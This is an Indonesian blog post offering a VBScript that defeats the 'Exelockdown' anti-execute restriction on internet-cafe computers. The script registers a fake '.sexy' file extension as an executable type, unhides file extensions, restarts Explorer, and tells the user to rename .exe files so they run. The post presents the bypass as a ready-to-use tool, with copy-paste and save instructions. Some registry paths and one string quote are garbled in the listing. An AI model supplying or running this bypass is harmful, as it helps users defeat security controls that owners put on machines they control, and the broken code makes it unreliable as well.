Ada cara buat matikan tuh anti-execute, bila kamu sering kewarnet dan menemukan pc, yang mana tidak bisa membukan file aplikasi ataupun file instalasi. dengan menggunakan script vbs.
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = "."
On error resume next
Tanya = MsgBox("By Pass Exelockdown dengan Registry Shell Spawning" & _
vbNewLine & "Reset Exelockdown?", 36,"Exelockdown Hacking – by Lovepassword")
If Tanya = 6 Then 'Bila dipilih YA
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\" & strComputer & "ootdefault:StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy",,"exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy","Content Type","application/x-msdownload"
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexyPersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexyPersistentHandler",,"{098f2470-bae0-11cd-b579-08002b30bfeb}"
objRegistry.CreateKey HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER,"SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced","HideFileExt",0
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\" & strComputer & "ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject("Wscript.Shell")
objShell.Run "explorer.exe"
msgbox "Copi file exe, rename menjadi file sexy, lalu jalankan",vbInformation,"Exelockdown Hacking – by 060183"
End If
'===========================================
Kopi paste tu source code nya ke notepad
save dengan extension .vbs
No comments:
Post a Comment